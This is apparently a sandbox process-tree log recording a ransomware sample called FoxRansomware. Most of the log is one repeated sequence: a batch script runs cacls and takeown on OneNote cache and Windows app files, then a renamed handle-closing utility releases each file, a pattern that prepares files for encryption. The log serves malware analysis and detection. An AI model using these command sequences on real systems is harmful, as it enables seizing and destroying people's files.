C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin""2⤵PID:5928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin" /E /G Admin:F /C3⤵PID:2332
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin"3⤵PID:5580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000054.bin" -nobanner3⤵PID:2840
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000054.bin" -nobanner4⤵PID:5920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin""2⤵PID:2928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin" /E /G Admin:F /C3⤵PID:5740
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin"3⤵PID:5652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000070.bin" -nobanner3⤵PID:1436
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000070.bin" -nobanner4⤵PID:5236
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6084
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin""2⤵PID:4788
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin" /E /G Admin:F /C3⤵PID:5508
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin"3⤵PID:5332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000007A.bin" -nobanner3⤵PID:2780
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000007A.bin" -nobanner4⤵PID:4404
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin""2⤵PID:1076
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin" /E /G Admin:F /C3⤵PID:3108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin"3⤵PID:5612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000007K.bin" -nobanner3⤵PID:4024
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000007K.bin" -nobanner4⤵PID:2800
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5132
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin""2⤵PID:2020
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin" /E /G Admin:F /C3⤵PID:4924
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin"3⤵
- Modifies file permissions
PID:5148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000008J.bin" -nobanner3⤵PID:2320
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000008J.bin" -nobanner4⤵PID:5144
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin""2⤵PID:4488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin" /E /G Admin:F /C3⤵PID:5592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin"3⤵PID:5748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000008V.bin" -nobanner3⤵PID:4424
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000008V.bin" -nobanner4⤵PID:2480
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin""2⤵PID:4676
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin" /E /G Admin:F /C3⤵PID:2548
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin"3⤵
- Modifies file permissions
PID:3488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000009.bin" -nobanner3⤵PID:3804
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000009.bin" -nobanner4⤵PID:2996
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin""2⤵PID:5348
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin" /E /G Admin:F /C3⤵PID:2844
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin"3⤵PID:884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000000N.bin" -nobanner3⤵PID:3728
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000000N.bin" -nobanner4⤵PID:5064
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5252
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin""2⤵PID:1900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin" /E /G Admin:F /C3⤵PID:6032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin"3⤵PID:5628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000011.bin" -nobanner3⤵PID:376
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000011.bin" -nobanner4⤵PID:2384
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3508
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2""2⤵PID:280
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2" /E /G Admin:F /C3⤵PID:5316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2"3⤵PID:5976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "settings.dat.LOG2" -nobanner3⤵PID:4776
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "settings.dat.LOG2" -nobanner4⤵PID:1064
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5772
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""2⤵PID:5616
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C3⤵PID:1016
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"3⤵PID:4532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "TileCache_100_0_Header.bin" -nobanner3⤵PID:6004
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "TileCache_100_0_Header.bin" -nobanner4⤵PID:5600
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2128
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin""2⤵PID:2372
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin" /E /G Admin:F /C3⤵PID:4448
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin"3⤵PID:5440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000000F.bin" -nobanner3⤵PID:5740
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000000F.bin" -nobanner4⤵PID:5652
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin""2⤵PID:6084
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin" /E /G Admin:F /C3⤵PID:4580
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin"3⤵
- Modifies file permissions
PID:652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000000Q.bin" -nobanner3⤵PID:1264
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000000Q.bin" -nobanner4⤵PID:5288
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5944
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin""2⤵PID:1128
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin" /E /G Admin:F /C3⤵PID:5496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin"3⤵PID:64
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000014.bin" -nobanner3⤵PID:3108
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000014.bin" -nobanner4⤵PID:5612
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4660
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin""2⤵PID:4376
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin" /E /G Admin:F /C3⤵PID:3436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin"3⤵PID:5360
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000058.bin" -nobanner3⤵PID:5276
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000058.bin" -nobanner4⤵PID:4400
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4420
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin""2⤵PID:5720
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin" /E /G Admin:F /C3⤵PID:4208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin"3⤵
- Modifies file permissions
PID:1300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000006D.bin" -nobanner3⤵PID:5468
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000006D.bin" -nobanner4⤵PID:2320
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin""2⤵PID:3272
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin" /E /G Admin:F /C3⤵PID:5592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin"3⤵PID:5748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000006N.bin" -nobanner3⤵PID:4436
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000006N.bin" -nobanner4⤵PID:5412
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4416
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin""2⤵PID:2616
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin" /E /G Admin:F /C3⤵PID:4832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin"3⤵PID:224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000007E.bin" -nobanner3⤵PID:2548
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000007E.bin" -nobanner4⤵PID:3488
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5632
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin""2⤵PID:6028
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin" /E /G Admin:F /C3⤵PID:1624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin"3⤵PID:2844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000007O.bin" -nobanner3⤵PID:884
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000007O.bin" -nobanner4⤵PID:5180
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3728
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin""2⤵PID:5800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin" /E /G Admin:F /C3⤵PID:2508
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin"3⤵PID:6032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000008D.bin" -nobanner3⤵PID:3168
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000008D.bin" -nobanner4⤵PID:5004
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin""2⤵PID:5880
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin" /E /G Admin:F /C3⤵PID:212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin"3⤵PID:5316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000008N.bin" -nobanner3⤵PID:5976
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000008N.bin" -nobanner4⤵PID:676
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin""2⤵PID:2864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin" /E /G Admin:F /C3⤵PID:3576
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin"3⤵PID:5480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000093.bin" -nobanner3⤵PID:4724
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000093.bin" -nobanner4⤵PID:5692
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin""2⤵PID:3176
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin" /E /G Admin:F /C3⤵PID:2820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin"3⤵PID:5724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "000000A9.bin" -nobanner3⤵PID:5872
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "000000A9.bin" -nobanner4⤵PID:5820
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin""2⤵PID:6080
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin" /E /G Admin:F /C3⤵PID:2528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin"3⤵PID:4580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000007V.bin" -nobanner3⤵PID:652
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000007V.bin" -nobanner4⤵PID:4296
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin""2⤵PID:288
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin" /E /G Admin:F /C3⤵PID:820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin"3⤵PID:5444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000089.bin" -nobanner3⤵PID:3368
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000089.bin" -nobanner4⤵PID:116
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin""2⤵PID:4660
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin" /E /G Admin:F /C3⤵PID:5320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin"3⤵PID:4032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000009B.bin" -nobanner3⤵PID:412
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000009B.bin" -nobanner4⤵PID:4960
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin""2⤵PID:5132
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin" /E /G Admin:F /C3⤵PID:5148
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin"3⤵PID:5384
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000009L.bin" -nobanner3⤵PID:2288
-
